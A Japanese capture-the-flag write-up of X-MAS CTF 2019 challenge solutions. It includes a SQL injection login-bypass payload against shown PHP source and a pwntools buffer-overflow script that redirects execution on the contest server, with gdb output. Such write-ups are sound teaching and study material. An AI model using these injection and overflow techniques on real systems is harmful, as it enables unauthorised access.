この大会は2019/12/14 4:00(JST)~2019/12/21 4:00(JST)に開催されました。
今回もチームで参戦。結果は156点で1744チーム中480位でした。
自分で解けた問題をWriteupとして書いておきます。
Merry Christmas! (!Sanity Checks)
白文字でフラグが書いてある。
X-MAS{HoHoHo__W3lc0me_T0_X-MAS_CTF_2019!}
Santa's Secret Club (!Sanity Checks)
Discordに入り、#generalチャネルのトピックを見ると、フラグが書いてある。
Merry Christmas! X-MAS CTF Starts on 13th of december X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}
X-MAS{J0in_S4nt4's_Secr3t_Club__W3_h4ve_cooki3s}
Sequel Fun (Web Exploitation)
HTMLソースを見ると、こんなコメントがある。
<!-- ?source=1 -->
http://challs.xmas.htsp.ro:11006/?source=1にアクセスする。
<?php if (isset ($_GET['source'])) { show_source ("index.php"); die (); } ?> <head> <link rel="stylesheet" type="text/css" href="style.css"> </head> <body> <div class="container"> <?php include ("config.php"); if (isset ($_GET['user']) && isset ($_GET['pass'])) { $user = $_GET['user']; $pass = $_GET['pass']; if (strpos ($user, '1') === false && strpos ($pass, '1') === false) { $conn = new mysqli ($servername, $username, $password, $dbname); $result = mysqli_query ($conn, "SELECT * FROM users WHERE user='" . $user . "' AND pass='" . $pass . "'", MYSQLI_STORE_RESULT); // TO-DO: Remove elf:elf account if ($result === false) { echo "<b>Our servers have run into a query error. Please try again later.</b>"; } else { if ($result->num_rows !== 0) { $row = mysqli_fetch_array ($result, MYSQLI_ASSOC); echo "<h1>You are logged in as: " . $row["user"] . "</h1><br>"; echo "<b class='flag'>"; if ($row ["uid"] === "0") echo $flag; else echo "Welcome elf!"; echo "</b>"; } else { echo "<b>Login fail.</b>"; } } } else { echo "<b>I don't like the number 1 :(</b>"; } } else { echo '<form class="center"> <h1>Santa Login:</h1> <label>Username:</label> <input type="text" name="user" autocomplete="off"><br> <label>Password:</label> <input type="password" name="pass" autocomplete="off"><br> <input type="submit" value="Connect"> </form>'; } ?> </div> <br> <script src="/js/snow.js"></script> <!-- ?source=1 --> </body>
このソースコードから、以下の条件を満たすと、フラグが表示されるはず。
・userもpassも"1"が含まれない。 ・uidが0
この条件を満たすように、以下を入力してログインしたらフラグが表示された。
user: a pass: a' union select 0, 'admin', 'pass
X-MAS{S0_1_c4n_b3_4dmin_w1th0ut_7h3_p4ssw0rd?}
Santa's crackme (Reverse Engineering)
Ghidraでデコンパイルする。
undefined8 main(void) { uint uVar1; byte local_7a; undefined local_79; byte local_78 [104]; int local_10; uint local_c; printf("Enter your license key: "); __isoc99_scanf("%100s",local_78); local_c = 0; local_10 = 0; while (local_78[(long)local_10] != 0) { local_7a = local_78[(long)local_10] ^ 3; local_79 = 0; uVar1 = strcmp((char *)&local_7a,flag_matrix + (long)local_10 * 2); local_c = local_c | uVar1; local_10 = local_10 + 1; } if (local_c == 0) { puts("License key is correct"); } else { puts("License key is incorrect"); } return 0; }
flag_matrixはこのようになっている。
flag_matrix XREF[2]: Entry Point(*), main:004011af(*) 00404060 5b 00 2e undefine 00 4e 00 42 00 50 00404060 5b undefined15Bh [0] XREF[2]: Entry Point(*), main:004011af(*) 00404061 00 undefined100h [1] 00404062 2e undefined12Eh [2] 00404063 00 undefined100h [3] 00404064 4e undefined14Eh [4] 00404065 00 undefined100h [5] 00404066 42 undefined142h [6] 00404067 00 undefined100h [7] 00404068 50 undefined150h [8] 00404069 00 undefined100h [9] 0040406a 78 undefined178h [10] 0040406b 00 undefined100h [11] 0040406c 36 undefined136h [12] 0040406d 00 undefined100h [13] 0040406e 37 undefined137h [14] 0040406f 00 undefined100h [15] 00404070 6d undefined16Dh [16] 00404071 00 undefined100h [17] 00404072 34 undefined134h [18] 00404073 00 undefined100h [19] 00404074 37 undefined137h [20] 00404075 00 undefined100h [21] 00404076 5c undefined15Ch [22] 00404077 00 undefined100h [23] 00404078 32 undefined132h [24] 00404079 00 undefined100h [25] 0040407a 36 undefined136h [26] 0040407b 00 undefined100h [27] 0040407c 5c undefined15Ch [28] 0040407d 00 undefined100h [29] 0040407e 61 undefined161h [30] 0040407f 00 undefined100h [31] 00404080 37 undefined137h [32] 00404081 00 undefined100h [33] 00404082 67 undefined167h [34] 00404083 00 undefined100h [35] 00404084 5c undefined15Ch [36] 00404085 00 undefined100h [37] 00404086 37 undefined137h [38] 00404087 00 undefined100h [39] 00404088 34 undefined134h [40] 00404089 00 undefined100h [41] 0040408a 5c undefined15Ch [42] 0040408b 00 undefined100h [43] 0040408c 6f undefined16Fh [44] 0040408d 00 undefined100h [45] 0040408e 32 undefined132h [46] 0040408f 00 undefined100h [47] 00404090 60 undefined160h [48] 00404091 00 undefined100h [49] 00404092 30 undefined130h [50] 00404093 00 undefined100h [51] 00404094 6d undefined16Dh [52] 00404095 00 undefined100h [53] 00404096 36 undefined136h [54] 00404097 00 undefined100h [55] 00404098 30 undefined130h [56] 00404099 00 undefined100h [57] 0040409a 5c undefined15Ch [58] 0040409b 00 undefined100h [59] 0040409c 60 undefined160h [60] 0040409d 00 undefined100h [61] 0040409e 6b undefined16Bh [62] 0040409f 00 undefined100h [63] 004040a0 30 undefined130h [64] 004040a1 00 undefined100h [65] 004040a2 60 undefined160h [66] 004040a3 00 undefined100h [67] 004040a4 68 undefined168h [68] 004040a5 00 undefined100h [69] 004040a6 32 undefined132h [70] 004040a7 00 undefined100h [71] 004040a8 6d undefined16Dh [72] 004040a9 00 undefined100h [73] 004040aa 35 undefined135h [74] 004040ab 00 undefined100h [75] 004040ac 7e undefined17Eh [76] 004040ad 00 undefined100h [77]
flag_matrix を1バイト飛ばしで、3とのXORを取ればよい。
flag_matrix = [0x5b, 0x2e, 0x4e, 0x42, 0x50, 0x78, 0x36, 0x37, 0x6d, 0x34, 0x37, 0x5c, 0x32, 0x36, 0x5c, 0x61, 0x37, 0x67, 0x5c, 0x37, 0x34, 0x5c, 0x6f, 0x32, 0x60, 0x30, 0x6d, 0x36, 0x30, 0x5c, 0x60, 0x6b, 0x30, 0x60, 0x68, 0x32, 0x6d, 0x35, 0x7e] flag = '' for code in flag_matrix: flag += chr(code ^ 3) print flag
X-MAS{54n74_15_b4d_47_l1c3n53_ch3ck1n6}
SN0WVERFL0W (Binary Exploitation)
Ghidraでデコンパイルする。
undefined8 FUN_00401167(void) { int iVar1; char local_12 [10]; setvbuf(stdin,(char *)0x0,2,0); setvbuf(stdout,(char *)0x0,2,0); puts("Helloooooo, do you like to build snowmen?"); read(0,local_12,100); iVar1 = strcmp(local_12,"yes"); if (iVar1 == 0) { puts("Me too! Let\'s build one!"); } else { puts("Mhmmm... Boring..."); } return 0; } void FUN_00401156(void) { puts("X-MAS{REAL FLAG ON THE SERVER}"); return; }
bofの脆弱性があるので、それを使ってFUN_00401156を呼び出せればよい。
$ gdb -q chall Reading symbols from chall...(no debugging symbols found)...done. gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAA Mhmmm... Boring... [Inferior 1 (process 9682) exited normally] gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAAAAAA Mhmmm... Boring... [Inferior 1 (process 9686) exited normally] gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAAAAAAAAAA Mhmmm... Boring... [Inferior 1 (process 9687) exited normally] gdb-peda$ r Starting program: /mnt/hgfs/Shared/chall Helloooooo, do you like to build snowmen? AAAAAAAAAAAAAAAAAAAA Mhmmm... Boring... Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x0 RCX: 0x7ffff7b042c0 (<__write_nocancel+7>: cmp rax,0xfffffffffffff001) RDX: 0x7ffff7dd3780 --> 0x0 RSI: 0x7ffff7dd26a3 --> 0xdd3780000000000a RDI: 0x1 RBP: 0x4141414141414141 (b'AAAAAAAA') RSP: 0x7fffffffdca0 --> 0x1 RIP: 0x7ffff70a4141 R8 : 0x7ffff7fda700 (0x00007ffff7fda700) R9 : 0x0 R10: 0x838 R11: 0x246 R12: 0x401070 (repz nop edx) R13: 0x7fffffffdd70 --> 0x1 R14: 0x0 R15: 0x0 [-------------------------------------code-------------------------------------] Invalid $PC address: 0x7ffff70a4141 [------------------------------------stack-------------------------------------] Display various information of current execution context Usage: context [reg,code,stack,all] [code/stack length] 0x00007ffff70a4141 in ?? ()
0x401156を18バイト目から送り込めばよい。
from pwn import * #p = process('./chall') p = remote('challs.xmas.htsp.ro', 12006) ret = p.recv() payload = '' payload += 'A' * 18 payload += p64(0x401156) print ret + payload p.sendline(payload) ret = p.recv() print ret
実行結果は以下の通り。
[+] Opening connection to challs.xmas.htsp.ro on port 12006: Done Helloooooo, do you like to build snowmen?AAAAAAAAAAAAAAAAAAV\x11\x00\x00\x00 Mhmmm... Boring... X-MAS{700_much_5n0000w} [*] Closed connection to challs.xmas.htsp.ro port 12006
X-MAS{700_much_5n0000w}
Santa's Forensics 101 (Forensics)
$ file X-MAS_Flag2.png X-MAS_Flag2.png: Zip archive data, at least v2.0 to extract $ mv X-MAS_Flag2.png X-MAS_Flag2.zip $ unzip X-MAS_Flag2.zip Archive: X-MAS_Flag2.zip warning [X-MAS_Flag2.zip]: 308188 extra bytes at beginning or within zipfile (attempting to process anyway) creating: hidden_data_dt/ inflating: hidden_data_dt/logo2.png $ strings hidden_data_dt/logo2.png | grep X-MAS X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}
X-MAS{W3lc0m3_t0_th3_N0rth_Pol3}
Mata Nui's Cookies (Crypto)
換字式暗号。Mata Nui cipherで調べると、対応表が見つかった。
対応表に従って、変換する。
X-MASMATANUIHASPREPAREDTHECOOKIES
X-MAS{MATANUIHASPREPAREDTHECOOKIES}